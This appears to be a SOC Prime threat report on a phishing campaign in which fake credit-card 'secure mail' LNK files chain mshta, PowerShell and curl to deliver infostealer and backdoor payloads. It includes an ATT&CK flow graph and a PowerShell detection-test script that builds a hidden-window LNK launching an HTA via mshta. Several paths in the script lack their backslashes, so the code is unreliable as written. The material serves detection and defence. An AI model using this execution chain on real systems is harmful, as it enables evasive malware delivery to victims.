SOC Prime Bias: Medium

29 May 2026 07:02 UTC
newspaper icon ASEC

Fake “Secure Mail” Lures Deliver Malicious Files Posing as Credit Card Firms

Author Photo
SOC Prime Team linkedin icon Follow
Fake “Secure Mail” Lures Deliver Malicious Files Posing as Credit Card Firms
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Summary

AhnLab uncovered a phishing campaign that delivers malicious LNK files disguised as secure mail notifications from a major Korean credit card provider. When opened, the shortcut launches an HTA through mshta.exe and PowerShell, then downloads follow-on payloads that change depending on whether Windows Defender is enabled. If Defender is active, the attackers use curl to retrieve encrypted files that are later decompressed and executed. If Defender is disabled, the chain shifts to direct DLL loading and additional downloader activity. The resulting malware supports information theft, keylogging, clipboard collection, and backdoor capabilities.

Investigation

The investigation showed that the initial LNK file launches mshta.exe, which runs an HTA containing obfuscated VBScript. That HTA downloads pipe.zip, which includes Base64-encoded scripts named 1.log, 1.ps1, and 2.log, all of which are decoded and executed in memory. When Defender is inactive, the malware instead downloads user.txt and sys.log, decrypts sys.log into sys.dll, and executes it through rundll32. Analysis of the decrypted user.txt exposed three Google Drive URLs used to fetch additional malicious files, including notepad.log, net, and app, which are stored under %LOCALAPPDATA%.

Mitigation

Recommended defenses include verifying the legitimacy of email attachments, preventing automatic execution of LNK files, and monitoring for suspicious use of mshta.exe and curl. Security teams should also search for and remove files such as 1.log, 1.ps1, 2.log, notepad.log, net, and app from %TEMP% and %LOCALAPPDATA%. In addition, defenders should inspect the system for unexpected registry changes and ensure that Windows Defender or another endpoint protection platform remains enabled and properly configured.

Response

If this activity is detected, isolate the affected system immediately, terminate any mshta.exe, curl, or rundll32 processes executing unknown files, and preserve the malicious artifacts for forensic review. Run a full system scan, reset any potentially exposed credentials, and monitor for follow-on backdoor activity linked to notepad.log. Detection content should also be updated with the observed indicators of compromise, and email security controls should be strengthened to block similar phishing lures in the future.

"graph TB %% Class definitions classDef action fill:#99ccff classDef operator fill:#ff9900 classDef builtin fill:#cccccc %% Nodes initial_user_exec["<b>Technique</b> – <b>T1204.002 User Execution: Malicious File</b><br/>Victim opens .lnk disguised as secure email from creditu2011card company."] class initial_user_exec action exec_mshta["<b>Technique</b> – <b>T1218.005 System Binary Proxy Execution: Mshta</b><br/>LNK launches PowerShell which runs mshta.exe to fetch remote HTA containing obfuscated VBScript."] class exec_mshta action exec_powershell["<b>Technique</b> – <b>T1059.001 Command and Scripting Interpreter: PowerShell</b><br/>PowerShell downloads additional payloads via curl."] class exec_powershell action masquerade["<b>Technique</b> – <b>T1036.008 Masquerading: Masquerade File Type</b><br/>LNK file masquerades as secure mail."] class masquerade action obfuscate["<b>Technique</b> – <b>T1027 Obfuscated Files or Information</b><br/>Payloads encrypted with AES, Base64u2011encoded; LNK icon smuggling."] class obfuscate action sandbox_evasion["<b>Technique</b> – <b>T1497.002 Virtualization/Sandbox Evasion: User Activity Based Checks</b><br/>Malware checks Windows Defender status."] class sandbox_evasion action cond_defender["<b>Operator</b> – AND condition based on Defender status"] class cond_defender operator defender_on["<b>Condition</b> – Defender enabled"] class defender_on action defender_off["<b>Condition</b> – Defender disabled"] class defender_off action download_pipe["<b>Action</b> – Downloads pipe.zip, decrypts and extracts 1.log, 1.ps1, 2.log."] class download_pipe action cred_access["<b>Technique</b> – <b>T1539 Browser Session Hijacking</b>, <b>T1185 Web Session Cookie</b>, <b>T1555.003 Credentials from Web Browsers</b><br/>Scripts perform credential access."] class cred_access action collection["<b>Technique</b> – <b>T1056.001 Input Capture: Keylogging</b> and <b>T1115 Clipboard Data</b><br/>Collect keystrokes and clipboard contents."] class collection action download_sys["<b>Action</b> – Downloads user.txt and sys.log, decrypts sys.dll."] class download_sys action load_rundll["<b>Technique</b> – <b>T1218.011 Signed Binary Proxy Execution: Rundll32</b><br/>Loads sys.dll via rundll32."] class load_rundll action persistence_appinit["<b>Technique</b> – <b>T1546.010 Event Triggered Execution: AppInit DLLs</b><br/>sys.dll used for persistence/evasion."] class persistence_appinit action command_control["<b>Technique</b> – <b>T1219 Remote Access Tools</b><br/>notepad.log provides remote command execution, file exfiltration and further data collection."] class command_control action clipboard_phish["<b>Technique</b> – <b>T1204.004 Malicious Copy and Paste</b><br/>Clipboard phishing techniques."] class clipboard_phish action %% Connections initial_user_exec –>|leads to| exec_mshta exec_mshta –>|executes| exec_powershell exec_powershell –>|enables| masquerade masquerade –>|enables| obfuscate obfuscate –>|enables| sandbox_evasion sandbox_evasion –>|triggers| cond_defender cond_defender –>|if Defender enabled| defender_on cond_defender –>|if Defender disabled| defender_off defender_on –>|downloads| download_pipe download_pipe –>|contains| cred_access cred_access –>|enables| collection defender_off –>|downloads| download_sys download_sys –>|loads| load_rundll load_rundll –>|establishes| persistence_appinit persistence_appinit –>|enables| command_control command_control –>|uses| clipboard_phish "

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

  • Attack Narrative & Commands:
    An adversary has obtained a foothold on the endpoint and wishes to execute arbitrary code while evading traditional application control. They craft a malicious HTA file containing obfuscated VBScript that, when rendered, writes a PowerShell back‑door to disk. To launch the HTA, they use a Windows shortcut (.lnk) that calls powershell.exe with a command that invokes mshta.exe. Executing the shortcut triggers the PowerShell → mshta chain, producing the exact telemetry the rule monitors.

  • Regression Test Script:

    # -------------------------------------------------
# 1. Create malicious HTA with obfuscated VBScript
# -------------------------------------------------
$htaPath = "$env:TEMPevil.hta"
$vbscript = @"
<script language='VBScript'>
' Obfuscated VBScript payload (example: write a file)
Dim fso, f
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.CreateTextFile("C:WindowsTemppwned.txt", True)
f.WriteLine "Compromised by ATT&CK"
f.Close
</script>
"@
Set-Content -Path $htaPath -Value $vbscript -Encoding ASCII

# -------------------------------------------------
# 2. Create a shortcut (.lnk) that runs PowerShell → mshta
# -------------------------------------------------
$lnkPath = "$env:TEMPlaunch_malicious.lnk"
$ws = New-Object -ComObject WScript.Shell
$shortcut = $ws.CreateShortcut($lnkPath)

# PowerShell command that launches mshta with the HTA file
$psCommand = "mshta.exe `"$htaPath`""
$shortcut.TargetPath = "C:WindowsSystem32WindowsPowerShellv1.0powershell.exe"
$shortcut.Arguments = "-NoProfile -WindowStyle Hidden -Command `"$psCommand`""
$shortcut.Save()

# -------------------------------------------------
# 3. Execute the shortcut to trigger the detection
# -------------------------------------------------
Write-Host "Executing malicious shortcut..."
& $lnkPath

# -------------------------------------------------
# 4. Pause to allow logs to be collected
# -------------------------------------------------
Start-Sleep -Seconds 10

  • Cleanup Commands:

    # Remove created artifacts
Remove-Item -Path "$env:TEMPevil.hta" -Force -ErrorAction SilentlyContinue
Remove-Item -Path "$env:TEMPlaunch_malicious.lnk" -Force -ErrorAction SilentlyContinue
Remove-Item -Path "C:WindowsTemppwned.txt" -Force -ErrorAction SilentlyContinue
Write-Host "Cleanup complete."

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free